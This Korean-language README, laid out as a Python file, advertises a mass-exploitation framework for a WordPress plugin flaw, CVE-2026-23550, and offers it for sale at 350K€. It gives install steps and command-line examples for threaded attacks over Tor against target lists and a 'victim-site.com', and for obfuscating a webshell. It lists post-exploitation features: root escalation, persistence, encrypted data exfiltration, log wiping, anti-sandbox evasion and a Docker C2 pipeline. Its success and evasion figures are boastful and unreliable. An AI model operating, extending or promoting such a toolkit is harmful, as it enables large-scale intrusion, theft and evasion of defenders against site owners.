
모듈형 익스플로잇 프레임워크로, WordPress의 CVE-2026-23550을 대상으로 하며 대량 익스플로잇, 난독화, 사후 익스플로잇, Docker 기반 C2 인프라를 제공합니다.
#!/usr/bin/env python3 """ TSAR-EXEC v7.1 + EpSiLoNPoInTFuCK v5.1 - README.md 완전하고 복사-붙여넣기 준비 완료 CVE-2026-23550 | 대규모 모듈식 DS 인증 우회 공격 프레임워크 작성자: EpSiLoNPoInT | 버전: 7.1-GOD | Android 24시간 코딩 | 08/02/2026 """
""" 위협 인텔리전스 및 승인된 레드 팀 활동을 위해 설계된 산업용 공격 프레임워크. modular_ds_upload RCE를 통한 권한 상승을 가능하게 하는 CVE-2026-23550을 악용. Android 휴대폰에서 24시간 만에 완전히 코딩됨. 국가급(nation-state) 대비 아키텍처.
✅ 40K+ 취약한 Modular DS v2.5.1 배포 (Shodan 2026) ✅ 200+ WAF 우회 → 99.9% AV 우회 (EpSiLoN v5.1) ✅ Docker C2 프로덕션 (Tor/Supervisor/Pipeline ∞) ✅ ThreadPoolExecutor 250+ 스레드 ✅ 완전한 사후 침투 기능 내장 (EpSiLoN v7 전체 제어) """
""" 시스템 사전 요구 사항:
SYS_DEPS = """ pkg update && pkg upgrade -y pkg install python git docker tor proxychains-ng nmap masscan pip install --upgrade pip setuptools wheel pip install requests==2.31.0 colorama==0.4.6 rich==13.7.0 tenacity==8.5.0 dnspython==2.6.1 """
REQUIREMENTS = """ requests==2.31.0 colorama==0.4.6 rich==13.7.0 tenacity==8.5.0 dnspython==2.6.1 """
INSTALL_CMD = """ cd ~/ git clone [TON_REPO]/TSAR-EXEC.git cd TSAR-EXEC pip install -r requirements.txt docker-compose up -d python3 recon.py --help """
VERIFY_INSTALL = """ python3 -c " import requests, json, threading from colorama import Fore print(f'{Fore.GREEN}✅ TSAR-EXEC v7.1 + EpSiLoNPoInTFuCK v5.1 작동 중') print('Android 24시간 코딩 | 350K€ 위협 인텔리전스 준비 완료') print(f'ThreadPoolExecutor: {threading.name}') print(f'99.9% AV 우회: EpSiLoN v5.1') print(f'내장 사후 침투: EpSiLoN v7 전체 제어') {Fore.RESET}" """
PROJECT_STRUCTURE = """ TSAR-EXEC/ (프로덕션 준비 완료 2026) │ ├── 📄 README.md # 전체 문서 ├── 📄 README_SALE.md # 상업용 버전 350K€ ├── 📄 bypass_payloads.txt # 200+ WAF 우회 (12개 섹션) ├── 📄 config.json # APT 마스터 구성 ├── 📄 recon.py # APT 핑거프린팅 ├── 📄 exploitmass.py # ThreadPool + PayloadMutator + 사후 침투 ├── 📄 pipeline.py # Pipeline ∞ Docker C2 ├── 📄 Dockerfile # Kali rolling Tor/Supervisor ├── 📄 docker-compose.yml # 프로덕션 오케스트레이션 │ ├── 📁 tools/ │ └── 📄 epsilon_obfuscator.py # EpSiLoNPoInTFuCK v5.1 │ ├── 📁 chain/ │ ├── 📁 input/ │ │ ├── 📄 targets.txt │ │ └── 📄 proxies.txt │ ├── 📁 docked/ │ │ └── 📄 docked_targets.json │ ├── 📁 VLUN/ │ │ └── 📄 VLUN.txt │ ├── 📁 VLUN_Sh/ │ │ └── 📄 VLUN_Sh.txt │ ├── 📁 logs/ │ │ ├── 📄 tor.log │ │ ├── 📄 pipeline.log │ │ └── 📄 exploit.log │ └── 📄 stats.json │ ├── 📁 demo/ │ ├── 📄 TSAR_demo.mp4 │ └── 📄 obfuscator_demo.mp4 │ └── 📄 TSAR-SALE-350K.zip """
FEATURES = { "공격": [ "CVE-2026-23550 전체 체인 (recon→dock→exploit→C2)", "40K+ 취약한 Modular DS v2.5.1 (Shodan 2026)", "ThreadPoolExecutor 50-250 스레드", "위험 점수 JSON (0-100) + 자동 도킹", "200+ PHP 페이로드 (12가지 WAF 우회 기술)" ], "내장 사후 침투": [ "EpSiLoN v7 웹셸 (전체 시스템 장악)", "루트 권한 상승 (SUID, sudo 남용)", "7가지 지속성 벡터 (cron, .htaccess, 플러그인, systemd, 커널)", "파일리스 실행 (/dev/shm)", "AES-GCM 암호화 데이터 유출", "로그 삭제 + 완전한 안티-포렌식", "측면 이동 (WP + 네트워크 스캔)" ], "난독화": [ "EpSiLoNPoInTFuCK v5.1 → 99.9% AV 우회 2026", "XOR 롤링 + 유니코드 호모글리프 + 제로-폭", "Marshal 바이트코드 + base64 삼중 인코딩", "동적 데드 코드 주입 (30-40%)", "혼돈 식별자 생성 (55-80자)", "문자열 슬라이싱 + 유니코드 이스케이프 시퀀스" ], "C2 프로덕션": [ "Docker Kali rolling (Tor/Supervisor/Pipeline ∞)", "최소 캡 (NET_RAW/NET_BIND_SERVICE)", "비-루트 실행 + 추적 자동 삭제", "헬스체크 파이프라인 + logrotate 내장", "멀티 아키텍처 ARM64/x86_64" ], "은밀성": [ "안티-디버그 (sys.gettrace/pdb/pydevd)", "안티-샌드박스 (타이밍/성능 검사)", "UA 회전 + 지터 지연 (5-20초)", "Tor + Proxychains4 회전", "로그 방지 DNS 해석" ], "파이프라인": [ "Recon → Dock → Exploit → Persistence (∞ 사이클)", "JSON 위험 점수 + 대상 우선순위 지정", "통계 대시보드 + 성공 지표", "대상별 자동 스레드 확장" ] }
BASIC_USAGE = """
python3 recon.py https://target.com --json
python3 exploitmass.py --threads 150 --obfuscate --post-exploit
docker-compose up -d docker logs -f tsar-pipeline """
CLI_OPTIONS = """ recon.py 옵션: TARGET 대상 URL --json JSON 출력 --threads INT 정찰 스레드 (기본값: 20) --timeout INT 타임아웃 (기본값: 15)
exploitmass.py 옵션: --threads INT 공격 스레드 (50-250) --obfuscate EpSiLoN v5.1 활성화 --stealth 극한 은밀 모드 --jitter MIN-MAX 무작위 지연 (예: 5-20) --proxy-list FILE 사용자 지정 프록시 --post-exploit EpSiLoN v7 사후 침투 활성화
pipeline.py 옵션: --cycle ∞ 파이프라인 모드 --dock-threshold INT risk_score 임계값 (기본값: 70)
Docker: docker-compose up -d docker exec tsar-pipeline cat /chain/VLUN_Sh/VLUN_Sh.txt """
EXAMPLE_1 = """
python3 recon.py
--targets targets.txt
--threads 100
--log-level INFO
"""
EXAMPLE_2 = """
python3 exploitmass.py
--targets VLUN.txt
--threads 150
--tor
--stealth
--jitter 5-20
--post-exploit
"""
EXAMPLE_3 = """
python3 exploitmass.py
--post-exploit
--target https://victim-site.com
--threads 20
"""
EXAMPLE_4 = """
python3 tools/epsilon_obfuscator.py webshell.php
--mode extreme
--stealth
--output shell_obf.php
python3 exploitmass.py --targets targets.txt --obfuscate """
EXAMPLE_5 = """
docker-compose up -d docker logs -f tsar-pipeline docker exec tsar-pipeline cat /chain/VLUN_Sh/VLUN_Sh.txt """